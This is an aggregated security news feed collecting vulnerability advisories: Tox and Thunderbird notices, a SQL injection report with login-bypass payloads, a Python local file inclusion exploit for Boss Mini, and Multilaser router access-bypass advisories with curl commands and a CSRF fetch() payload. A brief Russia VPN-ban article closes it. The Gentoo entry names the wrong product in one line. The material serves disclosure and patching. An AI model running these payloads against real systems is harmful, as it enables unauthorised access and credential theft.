Gentoo Linux Security Advisory 202403-1 - A vulnerability has been discovered in Tox which may lead to remote code execution. Versions greater than or equal to 0.2.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tox: Remote Code Execution  
     Date: March 03, 2024  
     Bugs: #829650  
       ID: 202403-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Tox which may lead to remote code  
execution.

Background  
==========

Tox is easy-to-use software that connects you with friends and family  
without anyone else listening in.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-libs/tox  < 0.2.13      >= 0.2.13

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

A stack-based buffer overflow allows remote attackers to crash the  
process or potentially execute arbitrary code via a network packet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/tox-0.2.13"

References  
==========

[ 1 ] CVE-2021-44847  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44847

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-01

This is an interesting whitepaper called Compromising Industrial Processes using Web-Based Programmable Logic Controller Malware. The authors present a novel approach to developing programmable logic controller (PLC) malware that proves to be more flexible, resilient, and impactful than current strategies.

Compromising Industrial Processes Using Web-Based Programmable Logic Controller Malware

Ubuntu Security Notice 6669-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6669-1March 04, 2024thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2024-0741, CVE-2024-0742,CVE-2024-0747, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0755, CVE-2024-1547, CVE-2024-1548, CVE-2024-1549, CVE-2024-1550,CVE-2024-1553)Cornel Ionce discovered that Thunderbird did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Alfred Peters discovered that Thunderbird did not properly manage memory whenstoring and re-accessing data on a networking channel. An attacker couldpotentially exploit this issue to cause a denial of service. (CVE-2024-1546)Johan Carlsson discovered that Thunderbird incorrectly handled Set-Cookieresponse headers in multipart HTTP responses. An attacker could potentiallyexploit this issue to inject arbitrary cookie values. (CVE-2024-1551)Gary Kwong discovered that Thunderbird incorrectly generated codes on 32-bitARM devices, which could lead to unexpected numeric conversions or undefinedbehaviour. An attacker could possibly use this issue to cause a denial ofservice. (CVE-2024-1552)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.8.1+build1-0ubuntu0.23.10.1Ubuntu 22.04 LTS:  thunderbird                     1:115.8.1+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.8.1+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6669-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0746, CVE-2024-0747,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0755, CVE-2024-1546, CVE-2024-1547, CVE-2024-1548,  CVE-2024-1549, CVE-2024-1550, CVE-2024-1551, CVE-2024-1552,  CVE-2024-1553Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6669-1

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

Multilaser RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through cookie manipulation.

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38946]=======

  Access Control Bypass in Multilaser router's Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160 web interface -  
V5.07.51_pt_MTL01(verified)  
                                                   -  
V5.07.52_pt_MTL01(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the router's web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser router has a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the router's management features.

In order to exploit this bug, it is necessary to add an "admin:" cookie in  
the  
requests. The following example shows how an unauthenticated user (not  
bearing  
a credential or session token) could perform it by using the curl tool[1]  
to  
retrieve, for example, a backup of the router config, which contains its  
web  
interface password:

[snippet]

$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E  
'HTTP/|Locatio'  
HTTP/1.0 302 Redirect  
Location: http://[routerIpAddress]/login.asp  
$  
$ # malicious unauthenticated request getting the web interface password  
$ # (in this example: "pass123")  
$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |  
grep  
-E 'HTTP/|http_passwd'  
HTTP/1.0 200 OK  
http_passwd=pass123

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user.

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the value of the cookie as a prerequisite for enforcing  
access  
control. Besides that, this value cannot be predictable. Upon not receiving  
a  
valid session token within the request, users should be redirected to the  
login  
page.

Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will  
reduce the  
attack window for this vulnerability, limiting the exploitation to only work  
when there is an active user session on the router. However, this equipment  
is  
also affected by another vulnerability with the same impact and no attack  
window  
limitation[3].

Furthermore, Multilaser informed that they contacted the firmware vendor of  
the  
model RE160, but due to the age of the equipment and its limitations, it  
will  
not receive an update. Therefore, it is recommended to replace the RE160  
router  
with a new one that is receiving updates (such as RE160V or RE163V)[4][5].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE160 was reported to vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor sent the available latest firmware for RE160;  
07/07/2023 - It was confirmed that the latest firmware was still vulnerable;  
26/10/2023 - Vendor informed that RE160 will not receive a full fix.

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
  [5]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160 Cookie Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.08_pt and 12.03.01.09_pt along with RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through URL manipulation.

    =====[Tempest Security Intelligence - Security Advisory -CVE-2023-38945]=======  Access Control Bypass in Multilaser routers' Web Management Interface  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >=====[Table ofContents]========================================================1. Overview2. Detailed description3. Other contexts & solutions4. Acknowledgements5. Timeline6. References=====[1.Overview]==============================================================* Systems affected: Multilaser RE160 web interface -V5.07.51_pt_MTL01(verified)                                                   -V5.07.52_pt_MTL01(verified)                                        (other routers/versions may beaffected)                    Multilaser RE160V web interface - V12.03.01.08_pt(verified)                                                    - V12.03.01.09_pt(verified)                                        (other routers/versions may beaffected)                    Multilaser RE163V web interface - V12.03.01.08_pt(verified)                                        (other routers/versions may beaffected)* Release date: 28/02/2024* CVSS score: 7.7 / High* CVSS vector:CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N* Impact: This vulnerability allows attackers to bypass the access controlof          the routers' web interface and perform management actions, such as          changing the DNS settings, enabling router remote access,changing the          IP routing table, and retrieving the WiFi and managementapplication          passwords. A noteworthy aspect also regards the fact that theattack          can be conducted remotely.=====[2. Detaileddescription]==================================================The affected Multilaser routers have a web management interface designed tographically assist users in configuring features and diagnosing problems.However, there is a bug in its access control mechanism that allowsunauthenticated users to access routers' management features.In order to exploit this bug, it is necessary to add a specific extensionat theend of the URLs. Some acceptable extension values are: js, css, png, jpg,gif,jsp. The following example shows how an unauthenticated user (not bearing acredential or session token) could perform it by using the curl tool[1] toretrieve, for example, a backup of the RE160 router config, which containsitsweb interface password:[snippet]$ # traditional unauthenticated request being redirected to the login page$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E'HTTP/|Locatio'HTTP/1.0 302 RedirectLocation: http://[routerIpAddress]/login.asp$$ # malicious unauthenticated request getting the web interface password$ # (in this example: "pass123")$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E'HTTP/|http_pass'HTTP/1.0 200 OKhttp_passwd=pass123[/snippet]Furthermore, the next example presents part of a JavaScript code that couldbeadded to a malicious website with the purpose of changing the router's DNSaddress and enabling remote access on vulnerable RE160V and RE163V routers.This can be achieved by exploiting this access control issue and a CSRF[3]:[code]fetch('http://[routerIpAddress]/goform/setSysTools/.js', {    'method': 'POST',    'mode': 'no-cors',    'headers': {        'Content-Type': 'application/x-www-form-urlencoded'    },    'body':'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&    module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'})[/code]By performing the aforementioned steps, an attacker can gain access to allfeatures of the web interface.This vulnerability can be exploited remotely via a malicious website or amobile/desktop application performing HTTP requests against the router. Andalso locally, by connecting to a vulnerable router (such as through thewirelessinfrastructure of a coffee shop or airport).=====[3. Other contexts &solutions]============================================Conceptually, in order to fix this issue, the server receiving the requestmustalways validate the session token in authenticated features as aprerequisitefor enforcing access control, regardless of any extension in the URL. Uponnotreceiving a valid session token within the request, users should beredirectedto the login page.Practically, to mitigate this issue, the RE160V should be updated tofirmwareV12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].Multilaser informed that they contacted the firmware vendor of the modelRE160,but due to the age of the equipment and its limitations, it will notreceive anupdate to fix the issue. Therefore, it is recommended to replace the RE160router with a new one that has received the fix (such as RE160V or RE163V).=====[4.Acknowledgements]======================================================  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >                              < twitter.com/palulabr >  Tempest Security Intelligence[2]=====[5.Timeline]==============================================================13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)fixedthe bug;28/04/2023 - The bug regarding model RE160V was reported to the vendor;29/06/2023 - A new contact was made with the company;29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;07/07/2023 - The same bug in model RE160 was reported to the vendor;16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) wherethebug was fixed;26/10/2023 - Vendor informed that RE160 will not receive a fix;26/10/2023 - Vendor released the RE160V update on its website[4].=====[6.References]============================================================  [1] https://curl.se  [2] https://tempest.com.br  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  [4]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  [5]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160V / RE160 URL Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.09_pt and 12.03.01.10_pt suffer from an access control bypass vulnerability through header manipulation.

ulldisclosure-bounces@seclists.org>  
Status: RO  
Content-Length: 5433  
Lines: 153

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38944]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
                    Multilaser RE163V web interface - V12.03.01.10_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the routers' web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to remove the Host header of  
the  
HTTP requests. The following example shows how an unauthenticated user (not  
bearing a credential or session token) could perform it by using the curl  
tool[1] to retrieve, for example, a backup of the router config:

[snippet]  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8  
HTTP/1.0 302 Redirect  
Server: GoAhead-Webs  
Date: Sun Jun 28 11:59:42 2009  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://[routerIpAddress]/login.html

$ # malicious unauthenticated request getting the router config  
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg  
$ head -8 RouterCfm.cfg  
HTTP/1.0 200 OK  
Date: Sun Jun 28 12:00:00 2009  
Server: GoAhead-Webs  
Last-modified: Sun Jun 28 12:00:00 2009  
Content-length: 16108  
Content-type: config/conf  
Connection: close

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user:

[snippet]

$ # getting the web interface password (in this example: "myPass333")  
$ # stored in base64 in the config file  
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'  
bXlQYXNzMzMz  
$ # decoding the web interface password  
$ echo "bXlQYXNzMzMz" | base64 -d  
myPass333

[/snippet]

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token as a prerequisite for enforcing access  
control, regardless of any header. Upon not receiving a valid session token  
within the request, users should be redirected to the login page.

Practically, to mitigate this issue, the routers should be updated to  
firmware  
V12.03.01.12 or newer[3][4].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE163V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor informed they were analysing the bug;  
19/07/2023 - Vendor shared a new firmware update for RE163V;  
25/07/2023 - The same bug in model RE160V was reported to the vendor;  
04/08/2023 - Vendor shared a new firmware update for RE163V;  
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;  
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;  
26/10/2023 - vendor released the updates on its website[3][4].

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v

Multilaser RE160V Header Manipulation Access Bypass

A list of topics we covered in the week of February 26 to March 3 of 2024

March 1, 2024 - Scammers are attacking Mac users interested in cryptocurrencies using a fake fix for a meeting link that won't work.

March 1, 2024 - Pig butchering scams are usually tied to cryptocurrency investments that make for big business with victims on both sides of the line.

February 29, 2024 - One of our researchers was targeted by a scammer advertising on Airbnb and hosting a fake Tripadvisor website.

February 29, 2024 - A vulnerability, now fixed, in Facebook could have allowed an attacker to take over a Facebook account without the victim needing to click on anything at all.

February 28, 2024 - Detecting and disrupting a months-long malware campaign on an MSP.

 A week in security (February 26 &#8211; March 3) 

By Deeba Ahmed
Russia Tightens Grip on Internet Freedom: VPN Ban Sparks Concerns.
This is a post from HackRead.com Read the original post: Russia Clamps Down on VPNs, Furthering Restrictions on Internet Access

The ban is likely due to people using VPN technology to access banned content and bypass government surveillance measures.

Russian media regulator Roskomnadzor plans to ban VPN services in Russia and Ukraine, potentially affecting free speech and information access, according to a new report by vpnMentor.

The report, authored by Jeremiah Fowler, a cybersecurity researcher known for identifying misconfigured databases on the Internet, sheds light on Russia’s recent efforts to further restrict internet freedom within its borders. It highlights the country’s new ban on popular VPN (Virtual Private Network) services, a move experts believe will significantly undermine online privacy and increase online censorship in the country. The ban will come into effect on 1st March 2024. 

It is worth noting that restricting VPNs may limit Russian citizens’ access to the outside world and form broader perspectives. In 2022, 23% of the Russian population used VPN services, up from 9% in 2021.

This surge is linked to Russia’s invasion of Ukraine and the blockage of 138,000 websites. Russia’s Freedom on the Net ranking of 21 out of 100 in 2023 indicates a preference for anonymity and privacy, prompting the government to ban VPNs.

This ban will not just affect internet users but also those fighting for freedom of expression, limiting access to independent news sources and anonymity, and increasing risk to activists, dissidents, and whistleblowers who rely on VPNs for secure communication. That’s because VPNs act as secure tunnels, encrypting internet connections to protect online privacy. They are used for data protection, accessing geo-restricted content, and private internet browsing without tracking.

According to vpnMentor’s blog post, Russian authorities have even banned advertisements and websites offering methods to bypass blocked resources in Russia and Ukraine. Russian authorities have pressured social media companies to restrict content, establish local businesses, store data locally, and allow security services unrestricted access to user data. Western companies have refused to comply, even if it means leaving the Russian market.

This move is part of a larger campaign from Russia to regulate and curb internet access, isolate internet users, and increase surveillance. In 2018, Russia requested Telegram to provide encryption keys for government access to users’ messages, audio, and pictures.

Last year Russian government banned various Western messaging apps, including Snapchat, WhatsApp, Discord, Skype for Business, Microsoft Teams, and Telegram, as well as European encrypted apps Viber and Threema, and Chinese communication app WeChat.

1.  Mullvad VPN’s Office Raided By Police for User Data
2.  Russia Bans WhatsApp, Discord, Telegram, and Others
3.  Top 10 worst countries for Internet freedom, censorship
4.  Researchers develop AI tool to evade Internet censorship
5.  Russia blocks 50 VPNs, Anonymizers in Telegram crackdown
6.  Geneva tool lets you bypass censorship by merely doing nothing
7.  ExpressVPN Removes Servers in India Against Data Collection Law

Tag

#web